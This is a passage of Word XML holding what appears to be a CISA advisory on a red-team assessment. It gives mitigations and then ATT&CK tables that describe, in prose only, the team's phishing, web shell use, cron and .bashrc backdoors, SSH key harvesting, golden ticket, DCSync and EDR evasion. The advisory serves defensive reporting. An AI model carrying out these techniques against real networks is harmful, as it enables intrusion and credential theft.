        </w:rPr>
        <w:br/>
        <w:t>Insecure configurations of systems Do not use the no_root_squash option.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remove Unconstrained Delegation from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., Constrained Delegation) or explore whether systems can be retired or further isolated from the enterprise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider disabling or limiting NTLM and WDigest Authentication if possible. Instead, use modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Message Block signing for more information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Adhere to the principle of least privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure the sudoers file contains only essential commands, avoids the use of wildcards, and contains password requirements for command execution. Lack centralized identity management and monitoring systems From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Examine who is accessing a resource, what is being accessed, where the request originates, and the time of activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use of known insecure and outdated software Keep systems and software up to date. If updates cannot be uniformly installed, update insecure configurations to meet updated standards. Insecure Keys and Credentials Implement a password protection policy for all certificates that contain private keys that ensures every certificate is encrypted with a strong password. Ensure all certificates are stored in a secure location [CPG 2.L]. Regularly audit network shares to identify files that contain passwords accessible to multiple users [CPG 2.L].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Provide training on the proper use of password management tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a policy that prohibits storing passwords in plaintext, and regularly review and audit Active Directory for plain text passwords [CPG 2.L]. If system administrators must store passwords in active directory, restrict access to only users who require them.</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Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture: Provide users with regular training and exercises, specifically related to phishing emails. Phishing accounts for majority of initial access intrusion events.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce phishing-resistant MFA to the greatest extent possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reduce the risk of credential compromise via the following: Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM authentication protocols.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.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 a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that: Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, and policy enforcement).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Upgrades applications and infrastructure to leverage modern identity management and network access practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Invests in technology and personnel to achieve these goals. Software Manufacturers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above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and responsibility should not fall on the end user, CISA urges software manufacturers to implement the following: Embed security into product architecture throughout the entire software development lifecycle (SDLC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Eliminate default passwords. Do not provide software with default passwords. To eliminate default passwords, require administrators to set a strong password [CPG 2.B] during installation and configuration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Design products so that the compromise of a single security control does not result in compromise of the entire system. For example, narrowly provision user privileges by default and employ ACLs to reduce the impact of a compromised account. This will make it more difficult for a malicious cyber actor to escalate privileges and move laterally.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reduce hardening guide size, with a focus on systems being secure by default. In this scenario, the red team noticed default Windows Server 2012 configurations that allowed them to enumerate privileged accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Important: Manufacturers need to implement routine nudges that are built into the product rather than relying on administrators to have the time, expertise, and awareness to interpret hardening guides.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These mitigations align with principles provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving security outcomes of their customers by applying these and other secure by design practices. By adhering to secure by design principles, software manufacturers can make their product lines secure out of the box without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.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more information on secure by design, see CISA's Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see the joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. VALIDATE SECURITY CONTROLS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addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 3 to Table 16). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. RESOURCES See CISA's RedEye </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tool on CISA's GitHub page. RedEye is an interactive open source analytic tool used to visualize and report red team command and control activities. See CISA's RedEye tool overview video for more information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>See CISA's Phishing Guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>See CISA's Secure by Design page to learn more about secure by design principles. APPENDIX: MITRE ATT&amp;CK TACTICS AND TECHNIQUES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See Table 3 to Table 16 for all referenced red team tactics and techniques in this advisory. Note: Unless noted, activity took place during Phase I. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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3: Reconnaissance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Technique Title ID Use Gather Victim Network Information T1590 The team conducted open source research on the target organization to gain information about its network. Gather Victim Network Information: Network Security Appliances T1590.006 The team conducted open source research on the target organization to gain information about its defensive tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Gather Victim Identity Information: Employee Names T1589.003 The team conducted open source research on the target organization to gain information about its employees.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Active Scanning T1595 The team conducted external reconnaissance of the organization's network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Gather Victim Network Information: IP Addresses T1590.005 The team conducted reconnaissance of the organization's external IP space.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Search Open Websites/Domains T1593 The team conducted open source research to identify information about the organization's network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Gather Victim Identity Information: Email Addresses T1589.002 The team looked for email addresses and names to infer email addresses from the organization's email syntax.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Search Open Technical Databases: Scan Databases T1596.005 The team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Search Open Technical Databases: DNS/Passive DNS T1596.001 The team performed reverse DNS lookups on IP addresses within the ranges the TAs provided.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4: Resource Development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Technique Title ID Use Acquire Infrastructure T1583 The team used third-party owned and operated infrastructure and services throughout its assessment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Obtain Capabilities: Tool T1588.002 The team obtained tools (i.e., Sliver, Mythic, Cobalt Strike, and other commercial C2 frameworks).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5: Initial Access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Technique Title ID Use Phishing T1566 The team designed spearphishing campaigns tailored to employees of the organization most likely to communicate with external parties.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exploit Public-Facing Application T1190 The team gained initial access to the target by exploiting an internet-facing Linux web server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Phishing: Spearphishing Link T1566.002 The team sent tailored spearphishing emails to 13 targets.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6: Execution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Technique Title ID Use User Execution T1204 The team's phishing attempts were ultimately unsuccessful; targets ran the payloads, but their execution did not result in the red team gaining access into the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User Execution: Malicious File T1204.002 One user responded and executed two malicious payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter T1059 The preexisting web shell allowed the team to run arbitrary commands on the server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: Python T1059.006 The team used python scripts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Services: Service Execution T1569.002 The team compromised a Domain Admin account and used it to run PSExec on multiple workstations and a domain controller.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Services: SMB/Windows Admin Shares T1021.002 The team established a session that originated from a target.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7: Persistence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Technique Title ID Use Server Software Component: Web Shell T1505.003 After the failed spearphishing campaigns, the red team continued external reconnaissance of the network and discovered a web shell left from a previous VDP program. Boot or Logon Initialization Scripts T1037 The team backdoored several scripts run at boot time for persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Scheduled Task/Job: Cron T1053.003 Some of the team's techniques included modifying preexisting scripts run by the cron utility and ifup-post scripts. Boot or Logon Initialization Scripts: Network Logon Script T1037.003 The team modified preexisting scripts run by the cron utility and ifup-post scripts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Event Triggered Execution: Unix Shell Configuration Modification T1546.004 The team used a backdoor in .bashrc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create Account: Local Account T1136.001 During Phase II, the team created a local administrator account on a target server system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account Manipulation T1098 During Phase II, the team created a local administrator account on a target server system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Create Account: Domain Account T1136.002 The team created AD accounts and added them to domain admins group.</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8: Privilege Escalation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Technique Title ID Use Valid Accounts T1078 The team moved laterally from the web server to the organization's internal network using valid accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 The team discovered that WEBUSER1 had excessive sudo rights, allowing them to run some commands as root without a password.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9: Defense Evasion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Technique Title ID Use Process Injection T1055 The team modified its processes by changing their names in memory and at execution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reflective Code Loading T1620 The team used Python scripts run in memory to avoid on-disk detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Obfuscated Files or Information: Binary Padding T1027.001 The team inflated its file sizes above the upload threshold of the organization's EDR.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10: Credential Access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Technique Title ID Use Unsecured Credentials: Credentials In Files T1552.001 The team discovered credential material on a misconfigured Network File System.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Steal or Forge Authentication Certificates T1649 The team used a certificate for client authentication discovered on the NFS share to compromise a system configured for Unconstrained Delegation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Steal or Forge Kerberos Tickets: Golden Ticket T1558.001 The team acquired a ticket granting ticket for a domain controller.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unsecured Credentials: Bash History T1552.003 The team used its escalated privileges to search bash command histories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Data from Network Shared Drive T1039 The team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories, and other sensitive data across all user files on the NFS share.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unsecured Credentials: Private Keys T1552.004 The team initially obtained 61 private SSH keys and a file containing valid cleartext domain credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Valid Accounts: Domain Accounts T1078.002 The team initially obtained 61 private SSH keys and a file containing valid cleartext domain credentials. Network Sniffing T1187 The red team leveraged this administrative access to upload a modified version of Rubeus in monitor mode to capture incoming tickets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>OS Credential Dumping: DCSync T1003.006 The team used DCSync through Linux tunnels to acquire the hash of several privileged accounts.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11: Discovery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Technique Title ID Use System Network Configuration Discovery T1016 The team leveraged the web shell to identify an open internal proxy server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account Discovery T1087 The team leveraged their AD data to identify administrators of the SCCM servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account Discovery: Domain Account T1087.002 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). During Phase II, the team performed AD enumeration by querying all domain objects from the DC, as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote System Discovery T1018 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). During Phase II, the team performed AD enumeration by querying all domain objects from the DC as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer. Permission Groups Discovery: Domain Groups T1069.002 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO). Group Policy Discovery T1615 The team queried LDAPS to collect information about users, computers, groups, access control lists (ACL), organizational units (OU), and group policy objects (GPO).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network Service Discovery T1046</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team scanned SMB port 445/TCP.</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During Phase II, the team launched a scan from inside the network from a previously gained workstation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Permission Groups Discovery T1069 The team discovered a user account through querying the Windows Server 2012 R2 target.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Permission Groups Discovery: Local Groups T1069.001 The team used Windows API calls to NetLocalGroupEnum and NetLocalGroupGetMembers to query local groups.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Trust Discovery T1482 During Phase II, the team enumerated trust relationships within the AD Forest.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Owner/User Discovery T1033 During Phase II, the team performed AD enumeration by querying all domain objects from the DC, as well as enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer.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12: Lateral Movement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Technique Title ID Use Taint Shared Content T1080 Since no_root_squash was used, the team could read and change any file on the shared file system and leave trojanized applications.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
